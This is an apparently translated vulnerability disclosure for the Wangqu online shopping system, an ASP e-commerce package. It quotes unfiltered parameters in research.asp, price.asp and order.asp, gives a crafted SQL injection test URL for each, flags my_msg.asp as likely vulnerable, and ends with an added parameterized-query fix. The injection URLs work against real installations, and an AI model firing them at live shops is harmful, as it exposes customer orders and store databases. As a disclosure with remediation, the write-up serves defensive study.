
网趣网上购物系统旗舰版(免费版) (Wangqu Online Shopping System, flagship free edition): SQL injection and fix

Date: 2013/4/19 12:09:00  Author: 平凡之路  Source: xuhantao.com

Version: 网趣网上购物系统旗舰版(免费版)
 
Download: ?id=6
 
----------------------------------------------------------------------
 
Location 1:
 
/research.asp
 
selectname is not filtered at all, which allows a search-type (LIKE) injection.
 
code:
 
Lines 7-12:
 
dim action,searchkey,anclassid,jiage,selectname
anclassid=request("anclassid")
searchkey=request("searchkey")
jiage=request("jiage")
action=request("action")
selectname=request("selectname") ' selectname is read here with no filtering at all

Lines 212-230:
 
if anclassid<>0 then
    select case action
    case "1"
        sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&" "
    case "2"
        sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&" "
    case "3"
        sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&" "
    end select
else
    select case action
    case "1"
        sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "
    case "2"
        sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") " ' this is the branch I used
    case "3"
        sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "
    end select
end if

Line 234:
 
rs.open "select * from products where "&sql1&"  and zhuangtai=0 order by adddate desc",conn,1,1

Constructed request:
 
/research.asp?anclassid=0&action=2&jiage=100000&selectname=京润%' and 1=1 and '%'='
 
--------------------------------------------------------------------
 
Location 2:
 
/price.asp
 
anid is not filtered at all, which allows a numeric-type injection.
 
code:
 
Line 74:
 
anid=trim(request("anid")) ' anid is read here with no filtering at all

Line 104:
 
if anid<>"" then
rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

Constructed request:
 
:8080/price.asp?anid=62 and 1=1
 
---------------------------------------------------------------------
 
Location 3:
 
/order.asp
 
dan is not filtered at all, which allows a string-type injection.
 
code:
 
Line 64:
 
dingdan=request.QueryString("dan") ' dan is read here with no filtering at all

Line 66:
 
rs.open "select products.bookid,products.shjiaid,products.bookname,products.shichangjia,products.huiyuanjia,orders.actiondate,orders.shousex,orders.danjia,orders.feiyong,orders.fapiao,orders.userzhenshiname,orders.shouhuoname,orders.dingdan,orders.youbian,orders.liuyan,orders.zhifufangshi,orders.songhuofangshi,orders.zhuangtai,orders.zonger,orders.useremail,orders.usertel,orders.shouhuodizhi,orders.bookcount from products inner join orders on products.bookid=orders.bookid where orders.username='"&request.cookies("Cnhww")("username")&"' and dingdan='"&dingdan&"' ",conn,1,1

Constructed request:
 
Place an order first; otherwise this cannot be exploited.
 
:8080/order.asp?dan=201277143453' and '1'='1
 
----------------------------------------------------------------------
 
Location 4:
 
/my_msg.asp
 
delid is not filtered at all (I used the free edition and could not test this, but the vulnerability very likely exists).
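The title promises a fix but the post shows none. The following is an added example, not code from the Wangqu product, showing the price.asp (numeric anid) and research.asp (selectname LIKE search) lookups quoted above rewritten with ADODB.Command parameters so user input is bound as data rather than spliced into the SQL text. It assumes conn is the page's already-open ADODB.Connection, as in the original snippets; the function names are hypothetical.

```asp
<%
' Added example, not the product's code. Assumes "conn" is the page's open ADODB.Connection.
Const adInteger = 3, adDouble = 5, adVarChar = 200, adParamInput = 1, adCmdText = 1

' price.asp, numeric-type injection: anid must be an integer before it goes near SQL,
' and even then it is bound to a ? placeholder instead of concatenated.
Function OpenByClass(conn, anid)
    Dim cmd
    If Not IsNumeric(anid) Then
        Err.Raise vbObjectError + 1, "price.asp", "anid must be numeric"
    End If
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "select * from products where anclassid=? order by adddate desc"
    cmd.Parameters.Append cmd.CreateParameter("anid", adInteger, adParamInput, 4, CLng(anid))
    Set OpenByClass = cmd.Execute   ' forward-only recordset, enough for listing results
End Function

' research.asp, search-type injection (the case "2" branch): the whole LIKE pattern is a
' parameter, so a quote inside selectname is data, not SQL. Note that % and _ typed by the
' user still act as LIKE wildcards; that affects matching, not the query structure.
Function OpenByBrand(conn, selectname, jiage)
    Dim cmd
    If Not IsNumeric(jiage) Then
        Err.Raise vbObjectError + 2, "research.asp", "jiage must be numeric"
    End If
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "select * from products where pingpai like ? " & _
                      "and (shichangjia<? or huiyuanjia<? or vipjia<?) " & _
                      "and zhuangtai=0 order by adddate desc"
    cmd.Parameters.Append cmd.CreateParameter("pingpai", adVarChar, adParamInput, 255, "%" & selectname & "%")
    cmd.Parameters.Append cmd.CreateParameter("p1", adDouble, adParamInput, 8, CDbl(jiage))
    cmd.Parameters.Append cmd.CreateParameter("p2", adDouble, adParamInput, 8, CDbl(jiage))
    cmd.Parameters.Append cmd.CreateParameter("p3", adDouble, adParamInput, 8, CDbl(jiage))
    Set OpenByBrand = cmd.Execute
End Function

' Usage in place of the original rs.open calls:
'   Set rs = OpenByClass(conn, Trim(Request("anid")))
'   Set rs = OpenByBrand(conn, Request("selectname"), Request("jiage"))
%>
```

The order.asp lookup (Location 3) takes the same treatment: bind both the cookie username and dan as adVarChar parameters instead of concatenating them.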
 
----------------------------------------------------------------------
 
Reposted from: 90sec.org
